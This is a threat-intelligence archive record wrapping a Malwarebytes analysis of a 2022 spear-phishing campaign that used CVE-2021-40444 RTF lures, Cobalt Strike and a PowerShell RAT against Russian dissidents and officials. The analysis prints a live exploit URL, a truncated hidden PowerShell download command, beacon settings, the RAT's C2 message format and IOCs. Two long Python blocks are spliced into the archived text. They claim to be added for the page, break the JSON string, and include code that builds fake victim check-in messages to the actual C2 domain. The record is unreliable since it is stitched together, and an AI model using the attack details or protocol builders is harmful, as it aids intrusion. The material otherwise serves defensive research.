{
	"id": "cd49237d-3c87-4bee-aa44-2ec2763bb776",
	"created_at": "2026-04-06T00:13:38.983538Z",
	"updated_at": "2026-04-10T03:36:33.618414Z",
	"deleted_at": null,
	"sha1_hash": "cc65fac49d2b42618b3799cec854e6006489b310",
	"title": "New spear phishing campaign targets Russian dissidents",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1105284,
	"plain_text": "New spear phishing campaign targets Russian dissidents\r\nBy Mark Stockley\r\nPublished: 2022-03-28 · Archived: 2026-04-05 18:49:25 UTC\r\nThis blog post was authored by Hossein Jazi.\r\n— Updated to clarify the two different campaigns (Cobalt Strike and RAT)\r\nSeveral threat actors have taken advantage of the war in Ukraine to launch a number of cyber attacks. The Malwarebytes Threat Intelligence team is actively monitoring these threats and has observed activities associated with the geopolitical conflict.\r\nMore specifically, we have seen several APT actors, such as Mustang Panda, UNC1151 and SCARAB, use war-related themes to target mostly Ukraine. We have also observed several different wipers and cybercrime groups such as FormBook using the same tactics. Besides those known groups, we saw an actor that used multiple methods to deploy variants of Quasar RAT. These methods include documents that exploit CVE-2017-0199 and CVE-2021-40444, macro-embedded documents, and executables.\r\nOn March 23, we identified a new campaign that, instead of targeting Ukraine, focuses on Russian citizens and government entities. Based on the email content, it is likely that the threat actor is targeting people who are against the Russian government.\r\nThe spear phishing emails warn people who use websites, social networks, instant messengers and VPN services that have been banned by the Russian government that criminal charges will be laid. 
Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.\r\nSpear phishing as the main initial infection vector\r\nThese emails pretend to be from the “Ministry of Digital Development, Telecommunications and Mass Communications of the Russian Federation” and the “Federal Service for Supervision of Communications, Information Technology and Mass Communications” of Russia.\r\nWe have observed two documents associated with this campaign that both exploit CVE-2021-40444 (the MSHTML remote code execution vulnerability that Microsoft patched in September 2021). Even though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability. The actor also leveraged a new variant of this exploit called CABLESS. Sophos has reported an attack that used a CABLESS variant of this exploit, but in that case the actor did not use an RTF file; instead, the WSF data was prepended to a RAR archive.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/\r\nPage 1 of 10\r\nEmail with RTF file:\r\nФедеральная служба по надзору в сфере связи, информационных технологий и массовых коммуникаций (Federal Service for Supervision of Communications, Information Technology and Mass Communications)\r\nПредупреждение! Министерство цифрового развития, связи и массовых коммуникаций Российской Федерации (A warning! Ministry of Digital Development, Telecommunications and Mass Media of the Russian Federation)\r\nEmail with archive file:\r\nинформирование населения об критических изменениях в сфере цифровых технологий, сервисов, санкций и уголовной ответственности за их использование. (informing the public about critical changes in the field of digital technologies, services, sanctions and criminal liability for their use.)\r\nВнимание! 
Информирует Министерство цифрового развития, связи и массовых коммуникаций Российской Федерации (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)\r\nEmail with link:\r\nВнимание! Информирует Министерство цифрового развития, связи и массовых коммуникаций Российской Федерации (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)\r\nVictimology\r\nThe actor has sent its spear phishing emails to people with email addresses in these domains:\r\nmail.ru, mvd.ru, yandex.ru, cap.ru, minobr-altai.ru, stavminobr.ru, mon.alania.gov.ru, astrobl.ru, 38edu.ru, mosreg.ru, mo.udmr.ru, minobrnauki.gov.ru, 66.fskn.gov.ru, bk.ru, ukr.net\r\nBased on these domains, here is the list of potential victims:\r\nPortal of authorities of the Chuvash Republic (official Internet portal)\r\nRussian Ministry of Internal Affairs\r\nMinistry of Education and Science of the Republic of Altai\r\nMinistry of Education of the Stavropol Territory\r\nMinistry of Education and Science of the Republic of North Ossetia-Alania\r\nGovernment of the Astrakhan region\r\nMinistry of Education of the Irkutsk region\r\nPortal of state and municipal services of the Moscow region\r\nMinistry of Science and Higher Education of the Russian Federation\r\nAnalysis:\r\nThe lures used by the threat actor are in Russian and pretend to be from Russia’s “Ministry of Information Technologies and Communications of the Russian Federation” and “MINISTRY OF DIGITAL DEVELOPMENT, COMMUNICATIONS AND MASS COMMUNICATIONS”. 
One of them is a letter about limiting access to the Telegram application in Russia.\r\nThese RTF files contain an embedded URL that downloads an HTML file which exploits the vulnerability in the MSHTML engine:\r\nhttp://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html\r\nThe HTML file contains a script that executes the script in the WSF data embedded in the RTF file.\r\nThe actor has added WSF (Windows Script File) data at the start of the RTF file, before the RTF header. As you can see from figure 8, the WSF data contains JScript code that can be accessed from a remote location; in this case it is accessed by the downloaded HTML exploit file. The variant is called CABLESS because, unlike the original CVE-2021-40444 exploit, it does not need to drop a CAB archive: the script is already inside the document on disk.\r\nExecuting this script leads to spawning PowerShell to download a Cobalt Strike beacon from the remote server and execute it on the victim’s machine. (The deployed Cobalt Strike file is named Putty.exe, after the PuTTY SSH client.)\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden $ProgressPreference='SilentlyContinu\r\nThe following shows the Cobalt Strike config (an HTTPS beacon on port 443 with a 38.5 second sleep and 27% jitter):\r\n{ \"BeaconType\": [ \"HTTPS\" ], \"Port\": 443, \"SleepTime\": 38500, \"MaxGetSize\": 1398151, \"Jitter\": 27, \"C2Server\":\r\nSimilar lure used by another actor\r\nWe have also identified activity by another actor that uses a lure similar to the one used in the campaign described above. This activity is potentially related to Carbon Spider and uses the “Федеральная служба по надзору в сфере связи, информационных технологий и массовых коммуникаций” (Federal Service for Supervision of Communications, Information Technology and Mass Communications) of Russia as a template. 
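Before turning to the second actor's RAT, here is a triage check for the RTF layout described above for the Cobalt Strike campaign: a CABLESS CVE-2021-40444 document with WSF markup placed before the RTF header and the exploit URL carried inside the document. This is an added example written in Python for this page; it is not code from the post, from Malwarebytes, or from the attacker. The sample bytes are constructed to mimic the reported layout, and the assumption that the URL sits hex-encoded inside an objdata block is mine, not a detail the post confirms.

```python
import re

# Added triage helper for RTF files with a prepended WSF script block.
# The bytes of the RTF magic are built without a backslash literal so the
# snippet survives being stored inside a JSON string.
RTF_MAGIC = b'{' + bytes([92]) + b'rtf'           # the bytes '{', backslash, 'rtf'
WSF_MARKERS = (b'<job', b'<package', b'<script')   # Windows Script File markup
URL_RE = re.compile(rb'https?://[A-Za-z0-9./_?=%~:-]+')
HEX_RUN_RE = re.compile(rb'(?:[0-9A-Fa-f]{2}){16,}')   # 32+ hex chars, as in objdata


def find_urls(blob):
    # URLs in the raw bytes plus URLs hidden inside hex-encoded runs (objdata).
    found = [u.decode() for u in URL_RE.findall(blob)]
    for run in HEX_RUN_RE.findall(blob):
        try:
            decoded = bytes.fromhex(run.decode())
        except ValueError:
            continue
        found.extend(u.decode() for u in URL_RE.findall(decoded))
    return sorted(set(found))


def triage_rtf(data):
    # Locate the RTF header and report anything script-like that precedes it.
    offset = data.find(RTF_MAGIC)
    prefix = data[:offset] if offset > 0 else b''
    markers = [m.decode() for m in WSF_MARKERS if m in prefix]
    return {
        'rtf_offset': offset,            # 0 for a normal RTF, -1 if not RTF at all
        'wsf_prefix': bool(markers),     # script markup before the RTF header
        'markers': markers,
        'urls': find_urls(data),
    }


# Constructed sample that mimics the reported layout of PKH.rtf: a WSF job
# first, then the RTF header, then an object whose hex data carries the
# exploit URL listed in the IOCs. Not a real sample.
EXPLOIT_URL = b'http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html'
WSF_PART = b'<job id=main><script language=JScript>WScript.Sleep(10);</script></job>'
OBJ_PART = (b'{' + bytes([92]) + b'objdata '
            + (b'mhtml:' + EXPLOIT_URL).hex().encode() + b'}')
SAMPLE = WSF_PART + RTF_MAGIC + b'1' + b'{' + bytes([92]) + b'object' + OBJ_PART + b'}}'

# Benign control: a plain RTF with no script prefix and no embedded URL.
BENIGN = RTF_MAGIC + b'1 hello}'

if __name__ == '__main__':
    for name, blob in (('sample', SAMPLE), ('benign', BENIGN)):
        print(name, triage_rtf(blob))
```

A non-zero rtf_offset on its own is worth a look (Word tolerates leading junk before the header); combined with WSF markup in that prefix and a URL in the object data it matches the layout described above and the file should be detonated or blocked rather than opened.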
In this case, the threat actor has deployed a PowerShell-based RAT.\r\nThe dropped PowerShell script is obfuscated using a combination of Base64 and custom obfuscation.\r\nAfter deobfuscating the script, you can see the RAT deployed by this actor. This PowerShell-based RAT has the capability to get the next stage payload and execute it. The next stage payload can be one of the following file types:\r\nJavaScript\r\nPowerShell\r\nExecutable\r\nDLL\r\nAll of its communications with its server are in Base64 format. This RAT starts its activity by setting up some configuration, which includes the C2 URL, intervals, debug mode and a parameter named group that is initialized with “Madagascar”, which is probably another alias of the actor.\r\nAfter setting up the configuration, it calls the “Initialize-Engine” function. This function collects the victim’s info, including OS info, username, hostname, BIOS info and also a host-domain value that shows whether the machine is a domain member or not. It then appends all the collected info into a string, separated by the “|” character, and at the end adds the group name and API config value. The created string is sent to the server using the Send-WebInit function. This function adds the “INIT%%%” string to the created string, Base64-encodes it and sends it to the server.\r\nAfter performing the initialization, it goes into a loop that keeps calling the “Invoke-Engine” function. This function checks the incoming tasks from the server, decodes them and calls the proper function to execute the incoming task. 
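To make the check-in and tasking exchange concrete, here is an added Python model of the protocol described in this section, using the INIT%%%, GETTASK%% and PUTTASK%% markers the post names, together with a decoder that classifies captured request bodies (for example from proxy logs). This is example code added for this page, not the RAT's own code and not Malwarebytes tooling. Assumptions the post does not state: the marker is a prefix, the INIT fields are joined by “|” in the order given below, and the text is UTF-8 (UTF-16LE, which PowerShell also commonly emits, is tried as a fallback). The log entries are constructed.

```python
import base64

# Added model of the PowerShell RAT's Base64 check-in/tasking protocol and a
# decoder for captured bodies. Field order and prefix placement are assumptions.
INIT, GETTASK, PUTTASK = 'INIT%%%', 'GETTASK%%', 'PUTTASK%%'
MARKERS = (INIT, GETTASK, PUTTASK)
INIT_FIELDS = ('os', 'user', 'host', 'bios', 'domain_member', 'group', 'api')  # assumed order


def encode(text):
    # Every message on the wire is Base64, as the post states.
    return base64.b64encode(text.encode('utf-8')).decode('ascii')


def build_init(info, group='Madagascar', api='1'):
    # INIT%%% + host fingerprint fields joined by '|' + group name + API config value.
    values = [info['os'], info['user'], info['host'], info['bios'],
              str(info['domain_member']), group, api]
    return encode(INIT + '|'.join(values))


def build_gettask():
    # Idle beacon: nothing to report, ready for a task.
    return encode(GETTASK)


def build_puttask(task_id, output):
    # Task result; the 'task_id|output' layout is an assumption.
    return encode(PUTTASK + task_id + '|' + output)


def decode_message(body):
    # Return (marker, payload) for a body that follows the protocol, else (None, None).
    try:
        raw = base64.b64decode(body, validate=True)
    except ValueError:            # not Base64 at all (binascii.Error is a ValueError)
        return None, None
    for codec in ('utf-8', 'utf-16-le'):
        try:
            text = raw.decode(codec)
        except UnicodeDecodeError:
            continue
        for marker in MARKERS:
            if text.startswith(marker):
                return marker, text[len(marker):]
    return None, None


def parse_init(payload):
    # Split an INIT payload back into named fields; None if the shape is wrong.
    parts = payload.split('|')
    if len(parts) != len(INIT_FIELDS):
        return None
    return dict(zip(INIT_FIELDS, parts))


def classify_log(entries):
    # entries: (destination_host, request_body) pairs; returns the protocol hits.
    hits = []
    for host, body in entries:
        marker, payload = decode_message(body)
        if marker is not None:
            hits.append((host, marker, payload))
    return hits


# Constructed sample log: a check-in, an idle beacon and a UTF-16LE task result
# to the C2 domain named in the IOCs, plus an unrelated Base64 body that must
# not be flagged. The victim details are invented.
VICTIM = {'os': 'Microsoft Windows 10 Pro', 'user': 'ivan', 'host': 'WS-0142',
          'bios': 'LENOVO N1UET35W', 'domain_member': False}
SAMPLE_LOG = [
    ('swordoke.com', build_init(VICTIM)),
    ('swordoke.com', build_gettask()),
    ('update.example', encode('ok')),
    ('swordoke.com', base64.b64encode(
        (PUTTASK + 'T1|whoami done').encode('utf-16-le')).decode('ascii')),
]

if __name__ == '__main__':
    for host, marker, payload in classify_log(SAMPLE_LOG):
        print(host, marker, parse_init(payload) if marker == INIT else payload)
```

The decoder keys on the markers rather than on the C2 domain, so it still fires if the actor rotates infrastructure; the short GETTASK%% body repeating at a fixed interval is the most reliable signal, since INIT is sent once per infection.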
If there is no task to execute, it sends “GETTASK%%” in Base64 format to its server to show it is ready to get tasks and execute them. The “IC” command is used to delete itself.\r\nThe result of the task execution is sent to the server using the “PUTTASK%%” command.\r\nInfrastructure\r\nThe following shows the infrastructure used by this actor, highlighting that the different lures are all connected.\r\nThe Malwarebytes Threat Intelligence team continues to monitor cyber attacks related to the Ukraine war. We are protecting our customers and sharing additional indicators of compromise.\r\nIOCs\r\nHashes are SHA-256.\r\nRTF files host domain:\r\ndigital-ministry[.]ru\r\nRTF files:\r\nPKH telegram.rtf\r\nb19af42ff8cf0f68e520a88f40ffd76f53a27dffa33b313fe22192813d383e1e\r\nPKH.rtf\r\n38f2b578a9da463f555614e9ca9036337dad0af4e03d89faf09b4227f035db20\r\nMSHTML exploit:\r\nwallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html\r\n4e1304f4589a706c60f1f367d804afecd3e08b08b7d5e6bd8c93384f0917385c\r\nCobalt Strike download URL:\r\nwallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe\r\nCobalt Strike:\r\nPutty.exe\r\nd4eaf26969848d8027df7c8c638754f55437c0937fbf97d0d24cd20dd92ca66d\r\nCobalt Strike C2:\r\nwikipedia-book[.]vote/async/newtab_ogb\r\nMacro based maldoc:\r\nc7dd490adb297b7f529950778b5a426e8068ea2df58be5d8fd49fe55b5331e28\r\nPowerShell based RAT:\r\n9d4640bde3daf44cc4258eb5f294ca478306aa5268c7d314fc5019cf783041f0\r\nPowerShell RAT C2:\r\nswordoke[.]com\r\nSource: https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/"
	],
	"report_names": [
		"new-spear-phishing-campaign-targets-russian-dissidents"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-10T02:00:03.645565Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Earth Preta ",
				"HoneyMyte ",
				"Mustang Panda ",
				"Red Delta ",
				"Red Lich ",
				"Stately Taurus ",
				"TA416 ",
				"Temp.Hex ",
				"Twill Typhoon "
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-10T02:00:05.310361Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434418,
	"ts_updated_at": 1775792193,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cc65fac49d2b42618b3799cec854e6006489b310.pdf",
		"text": "https://archive.orkl.eu/cc65fac49d2b42618b3799cec854e6006489b310.txt",
		"img": "https://archive.orkl.eu/cc65fac49d2b42618b3799cec854e6006489b310.jpg"
	}
}